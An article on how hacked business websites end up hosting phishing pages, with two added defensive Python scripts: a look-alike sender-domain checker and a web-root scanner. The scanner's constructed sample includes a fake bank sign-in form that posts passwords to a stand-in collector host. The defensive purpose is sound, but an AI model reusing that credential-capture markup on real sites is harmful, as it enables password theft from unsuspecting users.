With data breaches steadily rising, you’re probably acutely aware that your data is at risk when companies don’t implement high data security standards. What you may not realize is that your own website is at risk of being used by hackers to host phishing scams. While a phishing scam is not the same as a data breach, it can be equally damaging.
In 2018, the Internet Crime Complaint Center (IC3) noted there were 26,379 phishing victims who experienced a combined loss of $48,241,748. What’s alarming is that most of those attacks could have been prevented by a strict IT security policy. Unlike attacks in which hackers break directly into servers, phishing attacks succeed because of human error.
How a phishing scam works on a hacked website
When a hacker gains access to your website (either directly or through a vulnerability in your content management system), they upload fake webpages that mimic the sign-in pages of official websites like online banking, ecommerce, and social media sites.
Next, the hacker emails potential victims with a phony message urging them to log into their account. For example, a hacker might send an email that says, “your online banking account was compromised, please log in promptly to change your password.”
When a victim clicks on the link to change their password, they’re taken to a page that looks just like their online banking login site – except it’s a fake page hosted on your website.
When hackers gain access to your email account, the damage can be worse. They might email people in your company phishing for login information or other bits of sensitive data.
To protect your company against unwittingly hosting a phishing scam, take the following steps immediately.
1. Implement written policies for verifying requests received via email
Encryption will protect stolen data from being read, but employees need to be vigilant about verifying requests for data and money transfers. Your company needs a written policy for verifying requests that come through email. This policy might include calling the CEO or person in charge directly to verify a request for money or data received via email.
It seems like fraudulent requests would be obvious, but even intelligent, educated people get duped. For instance, a real estate mogul’s bookkeeper was recently tricked into wiring $388,000 into a fake bank account in Asia. The cybercriminal sent the bookkeeper correspondence from an email address that was just one letter off from a real company email address. The cybercriminal was able to provide the bookkeeper with details anyone could have obtained by following the real estate mogul’s transactions. However, it seemed legitimate to the bookkeeper. Although it’s hindsight now, the incident could have been prevented by verifying the request with a direct phone call.
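The “one letter off” trick in the story above is something a mail gateway or a helpdesk script can catch mechanically. The following Python is an added example, not part of the original article: it compares the sender’s domain against a list of trusted domains using edit distance (after folding common look-alike characters such as 0/o and 1/l), and then applies the written policy by flagging any money or data request for a phone call. The trusted domains, sample addresses and keyword lists are constructed for illustration.

```python
"""Screen inbound senders for look-alike domains and flag requests that
need out-of-band verification.  Added example; all domains are made up."""
import re

# Domains this company actually corresponds with (constructed sample).
TRUSTED_DOMAINS = {"examplerealty.com", "bank-example.com"}

# Character substitutions commonly used to imitate a domain.
HOMOGLYPHS = {"0": "o", "1": "l", "rn": "m", "vv": "w"}

# Subjects that fall under the written verification policy (constructed list).
MONEY_REQUEST = re.compile(
    r"\b(wire|transfer|invoice|payment|bank details|account number)\b", re.I)


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance: insertions, deletions and substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def normalize(domain: str) -> str:
    """Fold look-alike characters so 'examp1e' compares equal to 'example'."""
    for fake, real in HOMOGLYPHS.items():
        domain = domain.replace(fake, real)
    return domain


def sender_domain(address: str) -> str:
    """Extract the domain from 'Name <user@host>' or 'user@host'."""
    return address.rsplit("@", 1)[-1].strip("> ").lower()


def classify_sender(address: str, trusted=TRUSTED_DOMAINS, max_distance: int = 1):
    """Return ('trusted', domain), ('lookalike', imitated_domain) or ('external', None)."""
    domain = sender_domain(address)
    if domain in trusted:
        return ("trusted", domain)
    norm = normalize(domain)
    best = None
    for t in trusted:
        d = levenshtein(norm, normalize(t))
        if d <= max_distance and (best is None or d < best[0]):
            best = (d, t)
    if best is not None:
        return ("lookalike", best[1])
    return ("external", None)


def triage(address: str, subject: str):
    """Apply the policy: money/data requests always get a phone call;
    look-alike senders are called out explicitly.  Returns None if no action."""
    verdict, match = classify_sender(address)
    if MONEY_REQUEST.search(subject):
        if verdict == "lookalike":
            return f"STOP: sender domain imitates {match}; confirm by phone before acting"
        return "Confirm request by phone before acting (written policy)"
    if verdict == "lookalike":
        return f"Warn: sender domain imitates {match}"
    return None


if __name__ == "__main__":
    # Constructed sample messages, including a one-letter-off domain.
    samples = [
        ("Bookkeeper <bookkeeper@examplerealty.com>", "Lunch on Friday?"),
        ("CEO <ceo@examplereality.com>", "Urgent wire transfer today"),
        ("ceo@examp1erealty.com", "Updated bank details for vendor"),
        ("news@vendor-example.org", "Newsletter"),
    ]
    for addr, subj in samples:
        print(f"{addr:45} {subj:35} -> {triage(addr, subj)}")
```

The distance threshold of 1 catches single-character typosquats such as the one in the story; raising it to 2 catches more variants at the cost of more false positives on genuinely unrelated short domains, so tune it against your own correspondent list.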
Cybercriminals take advantage during tough times
Cybercriminals are currently taking advantage of the coronavirus pandemic by sending out phishing emails that appear to be from the World Health Organization asking for donations and linking to webpages that install malware on the victim’s computer. Make sure employees don’t click on links in unexpected emails even out of curiosity.
2. Integrate email security and encryption into your IT security plan
Is email security part of your IT security plan? If not, it should be. If you haven’t considered encrypting all company email end-to-end, it’s worth pursuing. Making encrypted email part of your IT security plan ensures that if any messages are intercepted by unauthorized parties, the data they contain can’t be read.
You never know when an employee will let their guard down. Encryption is the only way to protect sensitive information your employees need to send over email.
3. Keep your content management system (CMS) up-to-date
Most hackers gain unauthorized access to websites through vulnerabilities in content management systems. If you’re using a platform like WordPress, Joomla, or Magento, make sure to install every update as quickly as possible and keep all of your plugins updated.
If any plugins conflict with your website’s theme, either change your theme or find a new plugin. For security purposes, you should always limit the number of plugins you rely on since developers can stop updating them at any time. Once plugins are no longer updated, they become targets for hackers to gain access to your server.
You may not realize you’re hosting a phishing scheme
The problem with phishing schemes is that you might not realize you’re hosting one for a while. Most people only become aware when their hosting provider shuts down their entire account and sends an email to inform them of consumer complaints.
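Rather than waiting for the hosting provider’s complaint email, a site owner can look for the pages themselves. The Python below is an added example (not from the article): it walks a web root and reports HTML or PHP files that contain a password field, especially when they use banking or sign-in wording, post the form to a foreign host, or sit under an uploads directory where no HTML belongs. Known legitimate login pages are whitelisted. The sample web root it builds in a temporary directory, the host name and the keyword lists are all constructed for illustration.

```python
"""Scan a web root for pages that look like hosted phishing forms.
Added example; the sample site it creates is constructed, not real data."""
import re
import tempfile
import time
from pathlib import Path

PASSWORD_FIELD = re.compile(r'<input[^>]*type\s*=\s*["\']?password', re.I)
FORM_ACTION = re.compile(r'<form[^>]*action\s*=\s*["\']([^"\']+)', re.I)
# Wording typical of impersonated login pages (constructed, extend as needed).
BRAND_WORDS = re.compile(
    r"\b(online banking|sign in|log in to your account|verify your account|paypal)\b", re.I)
WEB_EXT = {".html", ".htm", ".php"}
UPLOAD_DIRS = ("wp-content/uploads/", "images/", "media/")


def suspicious_form_action(action: str, own_host: str) -> bool:
    """True when a form posts to a host other than this site."""
    m = re.match(r"https?://([^/]+)", action, re.I)
    return bool(m) and m.group(1).lower() != own_host.lower()


def inspect_file(path: Path, own_host: str):
    """Return a list of reasons the file looks like a credential-capture page."""
    text = path.read_text(errors="ignore")
    if not PASSWORD_FIELD.search(text):
        return []
    reasons = ["password field"]
    if BRAND_WORDS.search(text):
        reasons.append("impersonation wording")
    for action in FORM_ACTION.findall(text):
        if suspicious_form_action(action, own_host):
            reasons.append(f"posts to {action}")
    return reasons


def scan_webroot(root, own_host: str, expected_login_pages=(), newer_than_days=None, now=None):
    """Walk the web root and return sorted (relative_path, reasons) findings.
    newer_than_days limits the scan to recently modified files."""
    root = Path(root)
    now = now or time.time()
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_EXT:
            continue
        rel = path.relative_to(root).as_posix()
        if rel in expected_login_pages:
            continue
        if newer_than_days is not None and now - path.stat().st_mtime > newer_than_days * 86400:
            continue
        reasons = inspect_file(path, own_host)
        if reasons:
            if rel.startswith(UPLOAD_DIRS):
                reasons.append("html under uploads directory")
            findings.append((rel, reasons))
    return sorted(findings)


def build_sample_webroot() -> Path:
    """Create a constructed sample site: a real login page, a planted fake
    bank page under uploads, and an innocent page."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    files = {
        "wp-login.php": '<form action="/wp-login.php"><input type="password" name="pwd"></form>',
        "wp-content/uploads/2020/secure-bank/login.html":
            "<h1>Online Banking Sign In</h1>"
            '<form action="http://collector.example/post.php">'
            '<input type="text" name="user"><input type="password" name="pass"></form>',
        "about.html": "<p>About us</p>",
    }
    for rel, body in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    return root


if __name__ == "__main__":
    site = build_sample_webroot()
    for rel, reasons in scan_webroot(site, "www.example.com", expected_login_pages=("wp-login.php",)):
        print(f"{rel}: {', '.join(reasons)}")
```

Run it from cron against the real document root with `newer_than_days=1` and mail the output to an administrator; a non-empty report on a site that has no new login pages is a strong signal that someone else is uploading content.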
To avoid unknowingly hosting a phishing scheme, beef up your IT security plan and implement verification protocols for financial and data requests.